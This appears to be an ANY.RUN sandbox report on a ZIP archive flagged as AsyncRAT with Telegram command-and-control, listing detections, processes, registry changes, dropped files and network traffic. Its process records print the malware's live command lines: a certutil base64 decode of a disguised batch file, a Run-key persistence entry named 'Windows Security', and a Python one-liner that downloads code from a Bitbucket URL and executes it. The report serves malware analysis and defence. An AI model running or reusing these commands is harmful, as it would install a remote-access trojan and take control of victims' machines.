Malware analysis test2.zip Malicious activity | ANY.RUN

Add for printing

File name:	test2.zip
Full analysis:	https://app.any.run/tasks/2edf4efb-5482-45f4-9407-f008b054a018
Verdict:	Malicious activity
Threats:	AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions. Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. Malware Trends Tracker >>>
Analysis date:	November 12, 2024, 10:42:53
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	arch-exec arch-doc python evasion telegram rat asyncrat remote
Indicators:
MIME:	application/zip
File info:	Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:	7FCAB9A6B6C68E7B78DD9B11756516C1
SHA1:	FBB6DA37A8B6AC1264564B95840DB47627E372E0
SHA256:	925B306DEED915E569845993637E355A6B95DFA9A6AA515902D1CEEABD094C09
SSDEEP:	98304:UWTW4/2DvpYNU6Or9o+2MZ7cehyfjpcWuSYWGVgsXOI52VRZi+92h9h7pzXj0ovz:1xUe6AqfMCGlNIas8ujbVp

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 300 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: 240 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
FileZilla 3.65.0 (3.65.0)
Google Chrome (122.0.6261.70)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (122.0.2365.59)
Microsoft Edge Update (1.3.185.17)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (123.0)
Mozilla Maintenance Service (123.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Skype version 8.104 (8.104)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- Generic archive extractor
  - WinRAR.exe (PID: 6804)
- Changes the autorun value in the registry
  - reg.exe (PID: 4208)
- Modifies registry (POWERSHELL)
  - powershell.exe (PID: 6936)
- ASYNCRAT has been detected (SURICATA)
  - synaptics.exe (PID: 6420)
SUSPICIOUS
- Likely accesses (executes) a file from the Public directory
  - Rar.exe (PID: 6172)
  - certutil.exe (PID: 632)
  - reg.exe (PID: 4208)
  - synaptics.exe (PID: 6420)
- The process drops C-runtime libraries
  - Rar.exe (PID: 6172)
- Process drops legitimate windows executable
  - Rar.exe (PID: 6172)
- Process drops python dynamic module
  - Rar.exe (PID: 6172)
- Executable content was dropped or overwritten
  - Rar.exe (PID: 6172)
  - synaptics.exe (PID: 6420)
- Decoding a file from Base64 using CertUtil
  - cmd.exe (PID: 7144)
- Explorer used for Indirect Command Execution
  - reg.exe (PID: 4208)
- Uses REG/REGEDIT.EXE to modify registry
  - cmd.exe (PID: 7144)
- Loads Python modules
  - synaptics.exe (PID: 6420)
- Checks for external IP
  - svchost.exe (PID: 2172)
  - synaptics.exe (PID: 6420)
- Potential Corporate Privacy Violation
  - synaptics.exe (PID: 6420)
- Process communicates with Telegram (possibly using it as an attacker's C2 server)
  - synaptics.exe (PID: 6420)
- Starts POWERSHELL.EXE for commands execution
  - synaptics.exe (PID: 6420)
- Contacting a server suspected of hosting an CnC
  - synaptics.exe (PID: 6420)
- Connects to unusual port
  - synaptics.exe (PID: 6420)
INFO
- Executable content was dropped or overwritten
  - WinRAR.exe (PID: 5004)
- The process uses the downloaded file
  - WinRAR.exe (PID: 5004)
- Manual execution by a user
  - WinRAR.exe (PID: 5004)
  - cmd.exe (PID: 7144)
- Reads the machine GUID from the registry
  - Rar.exe (PID: 6172)
  - synaptics.exe (PID: 6420)
- Checks supported languages
  - Rar.exe (PID: 6172)
  - synaptics.exe (PID: 6420)
- Checks proxy server information
  - synaptics.exe (PID: 6420)
- Attempting to use instant messaging service
  - synaptics.exe (PID: 6420)
- Script raised an exception (POWERSHELL)
  - powershell.exe (PID: 6936)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.zip	\|	ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion:	20
ZipBitFlag:	0x0800
ZipCompression:	Deflated
ZipModifyDate:	2024:11:11 00:27:36
ZipCRC:	0xc26c3731
ZipCompressedSize:	486
ZipUncompressedSize:	1107
ZipFileName:	A vide?k ?s k?pek gyűjtem?nye szerzői jogv?delem alatt ?ll a szerző ?ltal..bat

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

137

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

528

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

632

certutil -f -decode "C:\Users\Public\Windows Security.~b64" "C:\Users\Public\Windows Security.bat"

C:\Windows\System32\certutil.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

CertUtil.exe

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\certutil.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll

2000

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

2172

C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

services.exe

User:

NETWORK SERVICE

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Host Process for Windows Services

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll

4208

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f

C:\Windows\System32\reg.exe

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Registry Console Tool

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll

5004

"C:\Program Files\WinRAR\WinRAR.exe" x -iext -ow -ver -- "C:\Users\admin\Desktop\test2.zip" C:\Users\admin\Desktop\test2\

C:\Program Files\WinRAR\WinRAR.exe

explorer.exe

User:

admin

Company:

Alexander Roshal

Integrity Level:

MEDIUM

Description:

WinRAR archiver

Exit code:

Version:

5.91.0

Modules

Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll

6172

Rar x -pKPLbkjVZ5zAXUErg9hu3pw -inul -y QExvbmVOb25l.rar C:\Users\Public\QExvbmVOb25l

C:\Users\admin\Desktop\test2\Rar.exe

cmd.exe

User:

admin

Company:

Alexander Roshal

Integrity Level:

MEDIUM

Description:

Command line RAR

Exit code:

Version:

6.22.0

Modules

Images
c:\users\admin\desktop\test2\rar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll

6228

C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\rundll32.exe

—

svchost.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows host process (Rundll32)

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\windows\system32\imagehlp.dll

6420

"C:\Users\Public\QExvbmVOb25l\synaptics.exe" -c "import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https://bitbucket.org/lonenone111/adonis/raw/5b1ff3245e798c426de8b88f375b93334fbb254a/Adonis_All').read().decode('utf-8')))"

C:\Users\Public\QExvbmVOb25l\synaptics.exe

cmd.exe

User:

admin

Company:

Python Software Foundation

Integrity Level:

MEDIUM

Description:

Python

Version:

3.10.11

Modules

Images
c:\users\public\qexvbmvob25l\synaptics.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ucrtbase.dll
c:\users\public\qexvbmvob25l\vcruntime140.dll

6804

"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\test2.zip

C:\Program Files\WinRAR\WinRAR.exe

—

explorer.exe

User:

admin

Company:

Alexander Roshal

Integrity Level:

MEDIUM

Description:

WinRAR archiver

Exit code:

Version:

5.91.0

Modules

Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll

Add for printing

Total events

17 748

Read events

17 726

Write events

Delete events

Modification events


(PID) Process:	(6804) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	1
Value: C:\Users\admin\Desktop\GoogleChromeEnterpriseBundle64.zip
(PID) Process:	(6804) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	0
Value: C:\Users\admin\Desktop\test2.zip
(PID) Process:	(6804) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	name
Value: 120
(PID) Process:	(6804) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	size
Value: 80
(PID) Process:	(6804) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	type
Value: 120
(PID) Process:	(6804) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	mtime
Value: 100
(PID) Process:	(6804) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\MainWin
Operation:	write	Name:	Placement
Value: 2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF3D0000002D000000FD03000016020000
(PID) Process:	(6804) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths
Operation:	write	Name:	name
Value: 256
(PID) Process:	(6804) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths
Operation:	write	Name:	size
Value: 80
(PID) Process:	(6804) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths
Operation:	write	Name:	psize
Value: 80

Add for printing

Executable files

129

Suspicious files

597

Text files

1 358

Unknown types

Dropped files

PID	Process	Filename		Type
5004	WinRAR.exe	C:\Users\admin\Desktop\test2\QExvbmVOb25l.rar		—
		MD5:—	SHA256:—
5004	WinRAR.exe	C:\Users\admin\Desktop\test2\A videók és képek gyűjteménye szerzői jogvédelem alatt áll a szerző által..pdf		pdf
		MD5:E0EA04FC5946F8CA5CA839EF94F095C2	SHA256:67D51F1F66C033FEAF0AF080706B885002B93BB230B8A94F362D933CB977453A
5004	WinRAR.exe	C:\Users\admin\Desktop\test2\Rar.exe		executable
		MD5:01F28B85ABF1993B7B14B3D15346F2E8	SHA256:B550465B9739594B6A193A16FA33F3CDDE3ECD4773FEB93E68C00FDBCF5EB8B8
6172	Rar.exe	C:\Users\Public\QExvbmVOb25l\vcruntime140.dll		executable
		MD5:1A84957B6E681FCA057160CD04E26B27	SHA256:9FAEAA45E8CC986AF56F28350B38238B03C01C355E9564B849604B8D690919C5
6172	Rar.exe	C:\Users\Public\QExvbmVOb25l\DLLs\libffi-7.dll		executable
		MD5:BC20614744EBF4C2B8ACD28D1FE54174	SHA256:0C7EC6DE19C246A23756B8550E6178AC2394B1093E96D0F43789124149486F57
6172	Rar.exe	C:\Users\Public\QExvbmVOb25l\DLLs\py.ico		image
		MD5:B35F68A3086562C4D5453FAAD5A3474E	SHA256:150C470F9943B806B44312EFDEC85755F22F8D7D52B31F93A9AF3C43E8627381
6172	Rar.exe	C:\Users\Public\QExvbmVOb25l\DLLs\python_tools.cat		cat
		MD5:E33C9E857AD27ADBE33B26AB13890657	SHA256:EDE0345311D5D825BA03E10423CF51515B3F3962F1286E46E1E6198ADFEC67CF
6172	Rar.exe	C:\Users\Public\QExvbmVOb25l\DLLs\pyd.ico		image
		MD5:1A8230030D821CF8EA57CE03AAEAD737	SHA256:C4EC1845A5724B2A83500F3BD940355E2FE26EFC6B4FE6C208365359A6130DA1
6172	Rar.exe	C:\Users\Public\QExvbmVOb25l\DLLs\pyc.ico		image
		MD5:B1C9980131A3F20E344AA3AA2C8DEA49	SHA256:FDA28A734788A3F175CB6AED4DAEB5F05F0E49F6A272CCD2051BA337F7B3B42F
6172	Rar.exe	C:\Users\Public\QExvbmVOb25l\DLLs\pyexpat.pyd		executable
		MD5:92C72753FA5C8EAA615B007F89CDB482	SHA256:EBBDE07AFB2BB356CD400E97D8AFB5ABBC121CC0CC90F99BEC9C3FA5CA60DE14

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
5488	MoUsoCoreWorker.exe	GET	200	23.32.238.112:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
5488	MoUsoCoreWorker.exe	GET	200	23.37.237.227:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
4360	SearchApp.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D	unknown	—	—	whitelisted
7028	svchost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
7164	SIHClient.exe	GET	200	23.37.237.227:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted
7164	SIHClient.exe	GET	200	23.37.237.227:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted
3620	backgroundTaskHost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D	unknown	—	—	whitelisted
4360	SearchApp.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D	unknown	—	—	whitelisted
6420	synaptics.exe	GET	200	208.95.112.1:80	http://ip-api.com/json/?fields=8195	unknown	—	—	shared
4360	SearchApp.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D	unknown	—	—	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	—	—	whitelisted
1172	RUXIMICS.exe	40.127.240.158:443	—	MICROSOFT-CORP-MSN-AS-BLOCK	IE	unknown
—	—	40.127.240.158:443	—	MICROSOFT-CORP-MSN-AS-BLOCK	IE	unknown
5488	MoUsoCoreWorker.exe	23.32.238.112:80	crl.microsoft.com	Akamai International B.V.	DE	whitelisted
5488	MoUsoCoreWorker.exe	23.37.237.227:80	www.microsoft.com	AKAMAI-AS	DE	whitelisted
4360	SearchApp.exe	2.19.80.57:443	www.bing.com	Akamai International B.V.	DE	whitelisted
4360	SearchApp.exe	192.229.221.95:80	ocsp.digicert.com	EDGECAST	US	whitelisted
6944	svchost.exe	40.127.240.158:443	—	MICROSOFT-CORP-MSN-AS-BLOCK	IE	unknown
4020	svchost.exe	239.255.255.250:1900	—	—	—	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted

DNS requests

Domain	IP	Reputation
crl.microsoft.com	23.32.238.112 23.32.238.107	whitelisted
www.microsoft.com	23.37.237.227	whitelisted
www.bing.com	2.19.80.57 2.19.80.115 2.19.80.8 2.19.80.99 2.19.80.80 2.19.80.123 2.19.80.50 2.19.80.24 2.19.80.17 2.19.80.26 2.19.80.90 2.19.80.25	whitelisted
ocsp.digicert.com	192.229.221.95	whitelisted
google.com	172.217.23.110	whitelisted
login.live.com	40.126.32.134 40.126.32.74 40.126.32.133 40.126.32.76 40.126.32.140 20.190.160.20 20.190.160.17 40.126.32.138	whitelisted
go.microsoft.com	23.218.210.69	whitelisted
th.bing.com	2.19.80.17 2.19.80.115 2.19.80.89 2.19.80.8 2.19.80.26 2.19.80.24 2.19.80.123 2.19.80.35 2.19.80.27	whitelisted
settings-win.data.microsoft.com	4.231.128.59	whitelisted
slscr.update.microsoft.com	52.149.20.212	whitelisted

Threats

PID	Process	Class	Message
2172	svchost.exe	Device Retrieving External IP Address Detected	INFO [ANY.RUN] External IP Check (ip-api .com)
6420	synaptics.exe	Device Retrieving External IP Address Detected	ET POLICY External IP Lookup ip-api.com
2172	svchost.exe	Device Retrieving External IP Address Detected	ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
2172	svchost.exe	Misc activity	SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram
2172	svchost.exe	Misc activity	ET HUNTING Telegram API Domain in DNS Lookup
6420	synaptics.exe	Misc activity	ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
6420	synaptics.exe	Misc activity	ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
6420	synaptics.exe	Domain Observed Used for C2 Detected	ET MALWARE Generic AsyncRAT Style SSL Cert
6420	synaptics.exe	Malware Command and Control Activity Detected	REMOTE [ANY.RUN] AsyncRAT Successful Connection

1 ETPRO signatures available at the full report

Add for printing

No debug info

General Info

test2.zip

7FCAB9A6B6C68E7B78DD9B11756516C1

FBB6DA37A8B6AC1264564B95840DB47627E372E0

925B306DEED915E569845993637E355A6B95DFA9A6AA515902D1CEEABD094C09

98304:UWTW4/2DvpYNU6Or9o+2MZ7cehyfjpcWuSYWGVgsXOI52VRZi+92h9h7pzXj0ovz:1xUe6AqfMCGlNIas8ujbVp

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Generic archive extractor

Changes the autorun value in the registry

Modifies registry (POWERSHELL)

ASYNCRAT has been detected (SURICATA)

SUSPICIOUS

Likely accesses (executes) a file from the Public directory

The process drops C-runtime libraries

Process drops legitimate windows executable

Process drops python dynamic module

Executable content was dropped or overwritten

Decoding a file from Base64 using CertUtil

Explorer used for Indirect Command Execution

Uses REG/REGEDIT.EXE to modify registry

Loads Python modules

Checks for external IP

Potential Corporate Privacy Violation

Process communicates with Telegram (possibly using it as an attacker's C2 server)

Starts POWERSHELL.EXE for commands execution

Contacting a server suspected of hosting an CnC

Connects to unusual port

INFO

Executable content was dropped or overwritten

The process uses the downloaded file

Manual execution by a user

Reads the machine GUID from the registry

Checks supported languages

Checks proxy server information

Attempting to use instant messaging service

Script raised an exception (POWERSHELL)

Malware configuration

Static information

TRiD

EXIF

ZIP

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats